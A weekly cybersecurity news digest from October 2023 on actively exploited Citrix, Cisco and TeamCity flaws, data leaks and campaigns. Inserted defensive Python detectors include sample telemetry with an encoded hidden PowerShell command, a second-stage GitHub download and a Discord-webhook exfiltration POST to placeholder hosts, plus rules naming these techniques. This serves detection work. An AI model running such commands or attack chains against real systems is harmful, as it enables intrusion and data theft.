Thursday, October 19th, 2023

Cybersecurity Week in Review (20/10/2023)

Critical Citrix NetScaler Bug Exploited in the Wild Since August

A critical zero-day vulnerability affecting Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway has been actively exploited by malicious actors, raising alarms in the government and technology sectors.

As a result, organisations are being urged to patch their systems immediately to avoid potential data breaches and security compromises.

Citrix recently addressed two unauthenticated vulnerabilities, both affecting multiple versions of NetScaler ADC and NetScaler Gateway: CVE-2023-4966, a sensitive information disclosure caused by a buffer over-read, and CVE-2023-4967, a denial-of-service flaw.

However, on Tuesday, Citrix revised its advisory to emphasise that exploits of CVE-2023-4966 on unpatched appliances have been observed in the wild.

The vulnerability affects the following versions of NetScaler ADC and Gateway appliances:

  • NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50
  • NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15
  • NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19
  • NetScaler ADC 13.1-FIPS before 13.1-37.164
  • NetScaler ADC 12.1-FIPS before 12.1-55.300
  • NetScaler ADC 12.1-NDcPP before 12.1-55.300

NetScaler ADC and NetScaler Gateway 12.1 (other than the FIPS and NDcPP builds listed above) is now End-of-Life (EOL) and remains vulnerable; it will not receive a fix, so affected appliances must be upgraded to a supported version.

Only appliances configured as Gateways (VPN virtual servers, ICA Proxy, CVPN, and RDP Proxy) or as authentication, authorisation and accounting (AAA) virtual servers are susceptible. Customers using Citrix-managed cloud services or Citrix-managed Adaptive Authentication are not affected.

The campaign primarily targeted professional services, technology firms and government organisations. Most alarming is that the threat actors demonstrated a way to bypass multi-factor authentication (MFA), which means patching alone is not enough to safeguard systems.

Successful exploitation of CVE-2023-4966 could enable attackers to hijack existing authenticated sessions, thereby circumventing MFA and other robust authentication measures.

These compromised sessions can persist even after the CVE-2023-4966 update has been applied, because upgrading does not invalidate sessions that already exist; after patching, administrators should terminate all active and persistent sessions on the appliance so that stolen session tokens stop working. Session hijacking was also identified in cases where session data had been stolen before the patch was installed and was subsequently used by an unidentified threat actor.
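The practical check that follows from the two points above is to look for one session token being used from more than one client, and to enumerate sessions that were established before the upgrade so they can be killed. The script below is an added example, not Citrix code: the log format is a constructed, simplified stand-in for NetScaler Gateway session records (timestamp, session id, user, client IP, user agent), and a real deployment would need a parser for its own syslog output.

```python
"""Flag authenticated sessions reused from a second client, and list
sessions that predate a patch and therefore survived it.

Added example (not Citrix code). SAMPLE_LOG is constructed; the
pipe-separated layout is an assumption, not the NetScaler format."""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime


@dataclass(frozen=True)
class SessionEvent:
    ts: datetime
    session_id: str
    user: str
    client_ip: str
    user_agent: str


# Constructed sample: "timestamp|session_id|user|client_ip|user_agent".
# sess-a1b2 is alice's session; the third line is the same token used
# from a different address and client, the stolen-session pattern.
SAMPLE_LOG = """\
2023-10-17T09:00:00|sess-a1b2|alice|203.0.113.10|Citrix Workspace/23.9
2023-10-17T09:05:00|sess-a1b2|alice|203.0.113.10|Citrix Workspace/23.9
2023-10-17T09:06:00|sess-a1b2|alice|198.51.100.77|Mozilla/5.0 (X11; Linux)
2023-10-17T09:10:00|sess-c3d4|bob|192.0.2.5|Citrix Workspace/23.9
"""


def parse_log(text: str) -> list[SessionEvent]:
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, user, ip, ua = line.split("|", 4)
        events.append(SessionEvent(datetime.fromisoformat(ts), sid, user, ip, ua))
    return events


def find_hijacked_sessions(events: list[SessionEvent]) -> dict[str, list[tuple[str, str]]]:
    """Map session_id -> sorted (client_ip, user_agent) pairs for every
    session token seen from more than one client fingerprint."""
    seen: dict[str, set[tuple[str, str]]] = defaultdict(set)
    for e in events:
        seen[e.session_id].add((e.client_ip, e.user_agent))
    return {sid: sorted(fps) for sid, fps in seen.items() if len(fps) > 1}


def sessions_to_terminate(events: list[SessionEvent], patch_time: datetime) -> list[str]:
    """Session ids first seen before the appliance was patched. Upgrading
    does not invalidate these, so they must be killed explicitly."""
    first_seen: dict[str, datetime] = {}
    for e in sorted(events, key=lambda e: e.ts):
        first_seen.setdefault(e.session_id, e.ts)
    return sorted(sid for sid, ts in first_seen.items() if ts < patch_time)


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print("reused from multiple clients:", find_hijacked_sessions(evs))
    patched_at = datetime.fromisoformat("2023-10-17T09:08:00")
    print("established before patch, kill these:", sessions_to_terminate(evs, patched_at))
```

A session id showing up with a second IP and user agent within minutes is the signal to act on, and the pre-patch list is the set of sessions to terminate regardless of whether they look hijacked yet.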

The identity of the threat actor behind these attacks remains undisclosed. Given the active exploitation of this vulnerability and the attractiveness of Citrix bugs to threat actors, it is imperative for users to act swiftly by updating their systems to the latest versions to mitigate potential threats.

This marks the second time in three months that Citrix NetScaler ADC and NetScaler Gateway have been targeted by cyberattacks. In July, Citrix issued a warning to its customers regarding a critical vulnerability, identified as CVE-2023-3519, in NetScaler ADC and NetScaler Gateway. This vulnerability had already been exploited by malicious actors.

Notably, it carried a critical CVSS score of 9.8 out of 10; it was a code injection flaw that could lead to unauthenticated remote code execution.

In August, the US Cybersecurity and Infrastructure Security Agency (CISA) added a critical vulnerability in the Citrix ShareFile storage zones controller, indexed as CVE-2023-24489, to its Known Exploited Vulnerabilities (KEV) catalogue. This flaw, carrying a CVSS score of 9.8, was being actively exploited, according to the agency's findings.

The vulnerability allowed remote, unauthenticated attackers to compromise vulnerable Citrix ShareFile instances due to inadequate access controls when handling cryptographic operations.

Source – https://www.computing.co.uk/news/4136137/critical-citrix-netscaler-bug-exploited-wild-august


ServiceNow leak: thousands of companies at risk

Digital business platform ServiceNow has a data exposure issue that may have put its customers' data at risk for years. The company has since tacitly acknowledged the warning, though it has neither confirmed nor denied it.

Types of data to have been exposed include names, email addresses, and internal documents, with “thousands of companies” likely affected.

The weak link is a misconfiguration involving a ServiceNow widget called Simple List, which renders records from a chosen table; combined with permissive access control lists, it allowed the contents of those tables to be read by unauthenticated users.

What’s more, the glitch has been around since the Simple List component was created in 2015. As yet, there’s no proof that it has been exploited by bad actors, though that does not necessarily mean it hasn’t.

To mitigate the issue, organizations are urged to implement IP address restrictions for inbound traffic, disable public widgets, or tighten their access control lists with a plugin.

ServiceNow commented on October 18th, saying it was “aware of the recent publications describing a potential misconfiguration issue.”

Though the company did not specifically confirm the reports, it pointed clients to what it described as “official guidance from ServiceNow” allowing them “to evaluate whether additional steps are needed to further secure their instances.”

It added: “We proactively work with customers on the ongoing safety of their security configurations, including Access Control Lists (ACLs), to ensure they are properly structured and aligned to their intended purpose. We make these protocols extensible so our customers can configure them based on their unique security needs – from companies with public portals providing broad access to information to enterprise-specific use cases where access is restricted to select users.”

ServiceNow said it would “continue to work closely with customers to ensure that their ACL protocols were aligned with their specific intent and purposes.”


Source – https://cybernews.com/news/servicenow-leak-thousands-companies-risk/


Hacker Leaks Millions of New 23andMe Genetic Data Profiles

A hacker has leaked an additional 4.1 million stolen 23andMe genetic data profiles for people in Great Britain and Germany on a hacking forum. Earlier this month, a threat actor leaked the stolen data of 1 million Ashkenazi Jews who used 23andMe services to find their ancestry info and genetic predispositions.

23andMe said that this data was obtained through credential stuffing attacks on accounts using weak passwords or credentials exposed in other data breaches. However, the company says there is no evidence of a security incident on their IT systems.

The company says that only a limited number of accounts were breached, but those accounts had opted into the 'DNA Relatives' feature, which allowed the threat actor to scrape data on millions of individuals.
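Credential stuffing has a recognisable shape in authentication logs: a single source replaying leaked username/password pairs tries many distinct accounts in a short time, most attempts fail, and the few successes are the accounts that need forced resets. The detector below is an added example, not 23andMe code; the log lines are constructed and the thresholds are assumptions to be tuned against real baseline traffic.

```python
"""Detect credential stuffing from authentication logs: one source IP,
many distinct usernames, high failure rate, a handful of successes.

Added example (not 23andMe code). SAMPLE_AUTH_LOG is constructed and
the window/threshold values are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: a stuffing burst from 198.51.100.9 and one
# ordinary user who mistyped a password once from 203.0.113.4.
SAMPLE_AUTH_LOG = """\
2023-10-01T02:00:01 ip=198.51.100.9 user=alice@example.com result=fail
2023-10-01T02:00:02 ip=198.51.100.9 user=bob@example.com result=fail
2023-10-01T02:00:03 ip=198.51.100.9 user=carol@example.com result=success
2023-10-01T02:00:04 ip=198.51.100.9 user=dave@example.com result=fail
2023-10-01T02:00:05 ip=198.51.100.9 user=erin@example.com result=fail
2023-10-01T02:00:06 ip=198.51.100.9 user=frank@example.com result=fail
2023-10-01T02:00:07 ip=198.51.100.9 user=grace@example.com result=success
2023-10-01T02:00:08 ip=198.51.100.9 user=heidi@example.com result=fail
2023-10-01T08:15:00 ip=203.0.113.4 user=alice@example.com result=fail
2023-10-01T08:15:20 ip=203.0.113.4 user=alice@example.com result=success
"""


def parse_auth_log(text: str) -> list[tuple[datetime, str, str, str]]:
    """Return (timestamp, ip, user, result) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, *fields = line.split()
        kv = dict(f.split("=", 1) for f in fields)
        events.append((datetime.fromisoformat(ts), kv["ip"], kv["user"], kv["result"]))
    return events


def detect_credential_stuffing(events, window=timedelta(minutes=10),
                               min_users=5, min_fail_rate=0.6):
    """Slide a time window over each source IP's attempts. Alert when the
    window holds at least min_users distinct accounts and the failure
    rate is at least min_fail_rate; report which accounts succeeded."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[1]].append(ev)
    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            win = evs[start:end + 1]
            users = {u for _, _, u, _ in win}
            fails = sum(1 for *_, r in win if r == "fail")
            if len(users) >= min_users and fails / len(win) >= min_fail_rate:
                alerts[ip] = {
                    "distinct_users": len(users),
                    "fail_rate": round(fails / len(win), 2),
                    "likely_compromised": sorted({u for _, _, u, r in win if r == "success"}),
                }
    return alerts


if __name__ == "__main__":
    for ip, info in detect_credential_stuffing(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(ip, info)
```

The ordinary user who fails once and then succeeds never trips the rule because a single account is involved; the burst source does, and its `likely_compromised` list is exactly the set of accounts whose reused passwords worked and should be reset and logged out.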

Yesterday, a threat actor named ‘Golem,’ who is allegedly behind the 23andMe attacks, leaked an additional 4.1 million data profiles of people in Great Britain and Germany on the BreachForums hacking forum.

This additional leak includes 4,011,607 lines of 23andMe data for people living in Great Britain. The threat actors claim that the stolen data includes genetic information on the royal family, the Rothschilds, and the Rockefellers.

“You can see the wealthiest people living in the US and Western Europe on this list,” the hackers say in the forum post.

Today, the same hacker released an additional CSV file containing the 23andMe data of 139,172 people living in Germany.

It has been reported that some of the leaked 23andMe data was being sold in August 2023 on the now-shut-down Hydra hacking forum, where the threat actor claimed to have stolen 300 terabytes of data. The threat actor on BreachForums also claims to have “hundreds of TBs of data” in their possession, likely indicating that this is the same stolen data.

While 23andMe says that only a small number of customer accounts were breached, the DNA Relatives feature turned this into a significantly larger data leak. These leaks have already led to a myriad of lawsuits against 23andMe that claim there is a lack of information about the breach and that the company did not adequately protect customers’ data.

Source – https://www.bleepingcomputer.com/news/security/hacker-leaks-millions-of-new-23andme-genetic-data-profiles/

D-Link Says Hacker Exaggerated Data Breach Claims

D-Link has launched an investigation after a hacker offered to sell information allegedly stolen from one of its networks and has determined that the claims are exaggerated.

On October 1, a user of the new BreachForums cybercrime website claimed they had breached the internal network of D-Link in Taiwan, which gave them access to a database storing the information of 3 million customers, as well as source code for the D-View network monitoring product. 

The hacker claimed to have stolen 1.2 Gb of data, including names, email addresses, postal addresses, phone numbers, and the time and date of the last login, and offered to sell the files for $500. 

“This does include the information of MANY government officials in Taiwan, as well as the CEOs and employees of the company,” said the seller, who also made available a small sample to demonstrate their claims. 

D-Link said it learned of the hacker forum post on October 2 and conducted an investigation. The probe has been completed and the networking equipment maker has confirmed suffering a data breach, but described the hacker’s claims as inaccurate, exaggerated and misleading. 

“The data was confirmed not from the cloud but likely originated from an old D-View 6 system, which reached its end of life as early as 2015. The data was used for registration purposes back then. So far, no evidence suggests the archaic data contained any user IDs or financial information. However, some low-sensitivity and semi-public information, such as contact names or office email addresses, were indicated,” the company explained. 

D-Link said the attacker gained access to its systems after an employee fell victim to a phishing attack. However, it believes impact is limited — its operations are not affected and neither are customers. 

The company pointed out several exaggerations and inaccuracies in the hacker’s post. D-Link claims that only 700 records were actually compromised, not 3 million, and noted that the hacker may have altered the login timestamps to make the data look more recent than it actually is. 

Source – https://www.securityweek.com/d-link-says-hacker-exaggerated-data-breach-claims/

Lazarus Group Targeting Defense Experts with Fake Interviews via Trojanized VNC Apps

The North Korea-linked Lazarus Group (aka Hidden Cobra or TEMP.Hermit) has been observed using trojanized versions of Virtual Network Computing (VNC) apps as lures to target the defense industry and nuclear engineers as part of a long-running campaign known as Operation Dream Job.

The threat actor tricks job seekers on social media into opening malicious apps for fake job interviews. To avoid detection, this backdoored application operates discreetly, only activating when the user selects a server from the drop-down menu of the Trojanized VNC client.

Once launched by the victim, the counterfeit app is designed to retrieve additional payloads, including a known Lazarus Group malware dubbed LPEClient, which comes fitted with capabilities to profile compromised hosts.

Also deployed by the adversary is an updated version of COPPERHEDGE, a backdoor known for running arbitrary commands, performing system reconnaissance, and exfiltrating data, as well as a bespoke malware specifically meant for transmitting files of interest to a remote server.

Targets of the latest campaign comprise businesses that are directly involved in defense manufacturing, including radar systems, unmanned aerial vehicles (UAVs), military vehicles, ships, weaponry, and maritime companies.

Operation Dream Job refers to a series of attacks orchestrated by the North Korean hacking outfit in which potential targets are contacted via suspicious accounts via various platforms such as LinkedIn, Telegram, and WhatsApp under the pretext of offering lucrative job opportunities to trick them into installing malware.

Late last month, details emerged of a Lazarus Group attack on an unnamed aerospace company in Spain, in which employees of the firm were approached on LinkedIn by the threat actor posing as a recruiter for Meta, leading to the delivery of an implant named LightlessCan.

Lazarus Group is just one of the many offensive programs originating from North Korea that have been linked to cyber espionage and financially motivated thefts.

Another prominent hacking crew is APT37 (aka ScarCruft), which is part of the Ministry of State Security, unlike other threat activity clusters – i.e., APT43, Kimsuky, and Lazarus Group (and its sub-groups Andariel and BlueNoroff) – that are affiliated with the Reconnaissance General Bureau (RGB).

Source – https://thehackernews.com/2023/10/lazarus-group-targeting-defense-experts.html

Ukrainian Activists Hack Trigona Ransomware Gang, Wipe Servers

A group of cyber activists under the Ukrainian Cyber Alliance banner has hacked the servers of the Trigona ransomware gang and wiped them clean after copying all the information available.

The Ukrainian Cyber Alliance fighters say they exfiltrated all of the data from the threat actor’s systems, including source code and database records, which may include decryption keys.

Ukrainian Cyber Alliance hackers gained access to Trigona ransomware’s infrastructure by using a public exploit for CVE-2023-22515, a critical vulnerability in Confluence Data Center and Server that can be leveraged remotely to escalate privileges.

The vulnerability was leveraged in attacks as a zero-day since September 14 by at least one threat group that Microsoft tracks as Storm-0062 (also known as DarkShadow and Oro0lxy).

The Ukrainian Cyber Alliance, or UCA for short, first breached Trigona ransomware’s Confluence server about six days ago, established persistence, and mapped the cybercriminal’s infrastructure completely unnoticed.

After a UCA activist using the handle herm1t published screenshots of the ransomware gang’s internal support documents, Trigona ransomware initially panicked and responded by changing the password and taking down its public-facing infrastructure.

However, over the next week, the activists managed to take all the information from the threat actor’s administration and victim panels, their blog and data leak site, and internal tools (Rocket.Chat, Jira, and Confluence servers).

herm1t said that they also exfiltrated the developer environment, cryptocurrency hot wallets as well as the source code and database records.

The activists don’t know if the information they transferred contains any decryption keys but they said they would release them if found.

After harvesting all available data from the ransomware gang, the UCA activists deleted and defaced their sites, also sharing the key for the administration panel site.

UCA claims that they were able to retrieve three backups with hundreds of gigabytes of likely stolen documents.

The Trigona ransomware operation emerged under this name in late October last year, when the gang launched a Tor site to negotiate ransom payments in Monero cryptocurrency with victims of their attacks.

Previously, samples of the malware had no specific name and were observed in the wild since the beginning of 2022. Before the Trigona branding, the operators used email to negotiate the ransom payments.

For a while, the cybercriminals were sufficiently active to compromise in a single month at least 15 companies in the manufacturing, finance, construction, agriculture, marketing, and high technology sectors.

Earlier this year, Trigona hackers were targeting Microsoft SQL servers exposed on the public internet using brute-force or dictionary attacks to obtain access credentials.

At the moment, due to the Ukrainian Cyber Alliance’s recent actions, none of the Trigona ransomware public websites and services are online.

Source – https://www.bleepingcomputer.com/news/security/ukrainian-activists-hack-trigona-ransomware-gang-wipe-servers/

JetBrains Vulnerability Being Exploited by North Korean Gov’t Hackers, Microsoft says

Multiple groups of hackers tied to North Korea’s government are targeting a vulnerability that emerged earlier this year in a popular product from Czech software giant JetBrains, Microsoft says.

Two groups tracked by Microsoft as Diamond Sleet and Onyx Sleet were seen exploiting CVE-2023-42793, a bug disclosed last month that affects TeamCity, a continuous integration and delivery server that development teams use to build, test and deploy software before release.

The company published a patch for the issue on September 20, but the subsequent release of technical details led to immediate exploitation by a range of ransomware groups, according to researchers at PRODAFT. More than 1,200 unpatched servers vulnerable to the issue were discovered.

Microsoft said on Wednesday that it has been notifying customers who are being targeted or who have already been compromised.

“While the two threat actors are exploiting the same vulnerability, Microsoft observed Diamond Sleet and Onyx Sleet utilizing unique sets of tools and techniques following successful exploitation,” Microsoft said.

“Based on the profile of victim organizations affected by these intrusions, Microsoft assesses that the threat actors may be opportunistically compromising vulnerable servers. However, both actors have deployed malware and tools and utilized techniques that may enable persistent access to victim environments,” they wrote.

Diamond Sleet was observed deploying backdoors after exploiting the vulnerability, giving it continuing access to a victim's system. Onyx Sleet, meanwhile, creates a new user account on the compromised system and gives it administrator-level access.

From there, Onyx Sleet tries to steal credentials and other data stored by browsers while also stopping the TeamCity service, “likely in an attempt to prevent access by other threat actors.”

Microsoft did not respond to requests for comment about what organizations were attacked in the campaigns and what the overall goal was.

But both groups have been tracked by security companies and researchers for years. Onyx Sleet typically targets defense and IT services organizations in South Korea, the United States, and India.

Last year, Microsoft accused Onyx Sleet of creating the H0lyGh0st ransomware and using it to attack small businesses in several countries since September 2021.

The group went after manufacturing organizations, banks, schools, and event and meeting planning companies — demanding ransoms of up to 5 Bitcoins (about $140,000).

Diamond Sleet focuses its efforts on espionage, data theft, financial gain, and network destruction, targeting media, IT services, and defense-related entities around the world. The group made waves in September when Microsoft revealed it was targeting organizations in Russia, one of North Korea’s few allies.

Microsoft warned two weeks ago that hackers connected to Diamond Sleet were weaponizing legitimate open-source software.

JetBrains TeamCity, which is used by developers at Fortune 100 companies, was previously linked to the SolarWinds incident by The New York Times, which reported that investigators were examining whether the tool had been used as an entry point into its customers' environments.

When first discovered, CVE-2023-42793 caused significant alarm among researchers who explained that it could be used by hackers to take over a development pipeline, allowing them to move throughout a company’s internal network and do extensive damage.

Source – https://therecord.media/teamcity-vulnerability-targeted-by-nk-hackers

Discord: A Playground for Nation-State Hackers Targeting Critical Infrastructure

In the latest evolution of threat actors abusing legitimate infrastructure for nefarious ends, new findings show that nation-state hacking groups have entered the fray, leveraging Discord to target critical infrastructure.

Discord, in recent years, has become a lucrative target, acting as a fertile ground for hosting malware using its content delivery network (CDN) as well as allowing information stealers to siphon sensitive data off the app and facilitating data exfiltration by means of webhooks.

Until now, the abuse of Discord has largely been limited to information stealers and grabbers that anyone can buy or download from the Internet. That may be changing: researchers found an artifact targeting Ukrainian critical infrastructure, though there is currently no evidence linking it to a known threat group.

The potential emergence of APT malware campaigns exploiting Discord’s functionalities introduces a new layer of complexity to the threat landscape.

The sample is a Microsoft OneNote file distributed via an email message impersonating the non-profit dobro.ua.

Once opened, the file shows references to Ukrainian soldiers to trick recipients into "donating" by clicking a booby-trapped button. That click executes a Visual Basic Script (VBS), which extracts and runs an embedded PowerShell script, which in turn downloads a second PowerShell script from a GitHub repository.

For its part, in the final stage, PowerShell takes advantage of a Discord webhook to exfiltrate system metadata.

The fact that the only goal of the final payload is obtaining information about the system indicates that the campaign is still in an early stage, which also fits with the usage of Discord as [command-and-control]. However, it is important to highlight that the actor could deliver a more sophisticated piece of malware to the compromised systems in the future by modifying the file stored in the GitHub repository.
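The chain described above (OneNote lure, VBS, PowerShell, GitHub download, Discord webhook exfiltration) is detectable from ordinary endpoint telemetry without any knowledge of the specific payload. The code below is an added example, not from the researchers or any vendor: it runs three rules over constructed process-creation and network events modelled on that chain, and the process names, paths, the GitHub URL and the Discord webhook id/token are all made up for the sample.

```python
"""Detect the OneNote -> VBS -> PowerShell -> GitHub -> Discord webhook
chain from process and network telemetry.

Added example; PROCS and NET are constructed events, not real
telemetry, and the repository and webhook identifiers are placeholders."""
from dataclasses import dataclass
from urllib.parse import urlparse

OFFICE_APPS = {"onenote.exe", "winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}
# Processes for which a Discord webhook POST is plausible user activity.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "discord.exe"}
GITHUB_HOSTS = {"github.com", "raw.githubusercontent.com", "objects.githubusercontent.com"}


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str      # lower-case base name of the executable
    cmdline: str


@dataclass
class NetEvent:
    pid: int
    method: str
    url: str


# Constructed process tree: explorer -> onenote -> wscript -> powershell,
# plus an unrelated browser. "SQBFAFgA" is base64 of UTF-16LE "IEX".
PROCS = [
    Proc(100, 1, "explorer.exe", "explorer.exe"),
    Proc(200, 100, "onenote.exe", 'onenote.exe "donate.one"'),
    Proc(300, 200, "wscript.exe", "wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\stage1.vbs"),
    Proc(400, 300, "powershell.exe", "powershell.exe -w hidden -ep bypass -enc SQBFAFgA"),
    Proc(500, 100, "chrome.exe", "chrome.exe"),
]
NET = [
    NetEvent(400, "GET", "https://raw.githubusercontent.com/example-org/example-repo/main/stage2.ps1"),
    NetEvent(400, "POST", "https://discord.com/api/webhooks/000000000000000000/EXAMPLE_TOKEN"),
    NetEvent(500, "POST", "https://discord.com/api/webhooks/111111111111111111/EXAMPLE_TOKEN"),
]


def ancestry(pid: int, procs: list[Proc]) -> list[str]:
    """Image names walking up from pid: [self, parent, grandparent, ...]."""
    by_pid = {p.pid: p for p in procs}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid].image)
        pid = by_pid[pid].ppid
    return chain


def detect(procs: list[Proc], net: list[NetEvent]) -> list[tuple[str, int, str]]:
    """Return (rule, pid, detail) alerts for the three stages of the chain."""
    alerts = []
    # Rule 1: a script host with an Office application anywhere above it.
    for p in procs:
        if p.image in SCRIPT_HOSTS:
            parents = ancestry(p.ppid, procs)
            if any(a in OFFICE_APPS for a in parents):
                alerts.append(("office_spawned_script_host", p.pid, " <- ".join([p.image] + parents)))
    by_pid = {p.pid: p for p in procs}
    for n in net:
        parsed = urlparse(n.url)
        host = (parsed.hostname or "").lower()
        image = by_pid[n.pid].image if n.pid in by_pid else "?"
        # Rule 2: webhook POST from anything that is not a browser or the Discord client.
        if (n.method == "POST" and host == "discord.com"
                and parsed.path.startswith("/api/webhooks/") and image not in BROWSERS):
            alerts.append(("discord_webhook_post_from_non_browser", n.pid, image))
        # Rule 3: a script host pulling content from GitHub (second-stage download).
        if image in SCRIPT_HOSTS and host in GITHUB_HOSTS:
            alerts.append(("script_host_fetch_from_github", n.pid, n.url))
    return alerts


if __name__ == "__main__":
    for alert in detect(PROCS, NET):
        print(alert)
```

Rule 2 is the one that catches the stage the page singles out: an interpreter posting to `discord.com/api/webhooks/` is exfiltration or command-and-control, while the same request from a browser is a user. Because the attacker can replace the file in the GitHub repository at any time, rule 3 is worth alerting on even when the downloaded script looks harmless today.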

Researcher analysis further revealed that loaders such as SmokeLoader, PrivateLoader, and GuLoader are among the most prevalent malware families that utilize Discord’s CDN to download a next-stage payload, including stealers like RedLine, Vidar, Agent Tesla, and Umbral.

On top of that, some of the common malware families that have been observed using Discord webhooks are Mercurial Grabber, Stealerium, Typhon Stealer, and Venom RAT.

The abuse of Discord’s CDN as a distribution mechanism for additional malware payloads showcases the adaptability of cybercriminals to exploit collaborative applications for their gain.

APTs are known for their sophisticated and targeted attacks, and by infiltrating widely used communication platforms like Discord, they can efficiently establish long-term footholds within networks, putting critical infrastructure and sensitive data at risk.

Source – https://thehackernews.com/2023/10/discord-playground-for-nation-state.html

Unpatched Cisco Zero-Day Vulnerability Actively Targeted in the Wild

Cisco has warned of a critical, unpatched security flaw impacting IOS XE software that’s under active exploitation in the wild.

Rooted in the web UI feature, the zero-day vulnerability is tracked as CVE-2023-20198 and has been assigned the maximum severity rating of 10.0 on the CVSS scoring system.

It’s worth pointing out that the shortcoming only affects enterprise networking gear that have the web UI feature enabled and when it’s exposed to the internet or to untrusted networks.

“This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access,” Cisco said in a Monday advisory. “The attacker can then use that account to gain control of the affected system.”

The problem affects both physical and virtual devices running Cisco IOS XE software that have the HTTP or HTTPS server feature enabled. As a mitigation, Cisco recommends disabling the HTTP server feature on internet-facing systems.

The networking equipment major said it discovered the problem after detecting malicious activity on an unidentified customer device as early as September 18, 2023, in which an unauthorized user created a local user account under the username “cisco_tac_admin” from a suspicious IP address. The unusual activity ended on October 1, 2023.

In a second cluster of related activity that was spotted on October 12, 2023, an unauthorized user created a local user account under the name “cisco_support” from a different IP address.

This is said to have been followed by a series of actions that culminated in the deployment of a Lua-based implant that allows the actor to execute arbitrary commands at the system level or IOS level.

The installation of the implant is achieved by exploiting CVE-2021-1435, a now-patched flaw impacting the web UI of Cisco IOS XE Software, as well as an as-yet-undetermined mechanism in cases where the system is fully patched against CVE-2021-1435.

“For the implant to become active, the web server must be restarted; in at least one observed case the server was not restarted so the implant never became active despite being installed,” Cisco said.

The backdoor, saved under the file path “/usr/binos/conf/nginx-conf/cisco_service.conf,” is not persistent, meaning it will not survive a device reboot. That said, the rogue privileged accounts that are created continue to remain active.
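Because the rogue accounts survive a reboot and the web UI is the exposure, the two things to check on every IOS XE device are whether `ip http server` / `ip http secure-server` are on and whether any privilege 15 account exists that administrators did not create. The script below is an added example, not Cisco code: it audits a constructed `show running-config` excerpt (placeholder hashes, made-up hostname) for exactly those two conditions. The commands to turn the servers off, `no ip http server` and `no ip http secure-server`, are the ones in Cisco's advisory.

```python
"""Audit an IOS XE running-config for the web UI exposure and for
unexpected privilege 15 accounts, including the cisco_tac_admin and
cisco_support names Cisco reported.

Added example (not Cisco code). SAMPLE_CONFIG is a constructed excerpt;
feed audit_config() the real 'show running-config' output instead."""
import re

# Local account names Cisco observed the attacker creating.
KNOWN_ROGUE_USERS = {"cisco_tac_admin", "cisco_support"}

# Constructed running-config excerpt; the secret hashes are placeholders.
SAMPLE_CONFIG = """\
hostname edge-rtr-01
!
username netops privilege 15 secret 9 $9$PLACEHOLDERHASH1
username cisco_tac_admin privilege 15 secret 9 $9$PLACEHOLDERHASH2
username helpdesk privilege 1 secret 9 $9$PLACEHOLDERHASH3
!
ip http server
ip http secure-server
ip http authentication local
!
"""


def privilege15_users(config: str) -> list[str]:
    """All local accounts configured with privilege level 15."""
    return sorted(m.group(1) for m in re.finditer(r"^username (\S+) privilege 15\b", config, re.M))


def web_ui_enabled(config: str) -> dict[str, bool]:
    """Whether the HTTP and HTTPS servers are on. A disabled server shows
    up as 'no ip http server', which the line-anchored regex does not match."""
    return {
        "http": re.search(r"^ip http server\s*$", config, re.M) is not None,
        "https": re.search(r"^ip http secure-server\s*$", config, re.M) is not None,
    }


def audit_config(config: str, expected_admins: set[str]) -> list[str]:
    """Findings for an operator: exposed web UI and accounts to investigate."""
    findings = []
    servers = web_ui_enabled(config)
    if servers["http"] or servers["https"]:
        findings.append("web UI enabled (ip http server / ip http secure-server): "
                        "disable it on internet-facing devices or restrict it to management networks")
    for user in privilege15_users(config):
        if user in KNOWN_ROGUE_USERS:
            findings.append(f"known rogue account from CVE-2023-20198 activity present: {user}")
        elif user not in expected_admins:
            findings.append(f"unexpected privilege 15 account: {user}")
    return findings


if __name__ == "__main__":
    for finding in audit_config(SAMPLE_CONFIG, expected_admins={"netops"}):
        print("[!]", finding)
```

An unexpected privilege 15 account is a finding even when its name is not one of the two reported, since the attacker chooses the name; the implant file itself lives at the path given above and is only visible from the device's shell, which this config-level audit does not reach.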

Cisco has attributed the two sets of activities to presumably the same threat actor, although the adversary’s exact origins are presently cloudy.

“The first cluster was possibly the actor’s initial attempt and testing their code, while the October activity seems to show the actor expanding their operation to include establishing persistent access via deployment of the implant,” the company noted.

The development has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to issue an advisory and add the flaw to the Known Exploited Vulnerabilities (KEV) catalog.

In April 2023, U.K. and U.S. cybersecurity and intelligence agencies alerted of state-sponsored campaigns targeting global network infrastructure, with Cisco stating that Route/switch devices are a “perfect target for an adversary looking to be both quiet and have access to important intelligence capability as well as a foothold in a preferred network.”

Threat actors have exploited CVE-2023-20198 to compromise and infect thousands of Cisco IOS XE devices with malicious implants, according to a new report from VulnCheck, which has released a scanner to detect the implant on affected devices.

Source – https://thehackernews.com/2023/10/warning-unpatched-cisco-zero-day.html

NoEscape Ransomware Emerges, Targeting Healthcare

A suspected successor of Avaddon ransomware, NoEscape ransomware uses multi-extortion tactics to target multiple industries, including healthcare, HC3 warned.

The Health Sector Cybersecurity Coordination Center (HC3) issued an analyst note regarding NoEscape ransomware, a new threat to healthcare and other industries. Although just two healthcare victims have been claimed by the group so far, NoEscape’s willingness to target healthcare is worrisome for the sector.

NoEscape only emerged in May 2023 but has already made a name for itself by using aggressive tactics to extort victims. NoEscape is believed to be a successor of Avaddon, a ransomware group that was shut down in 2021.

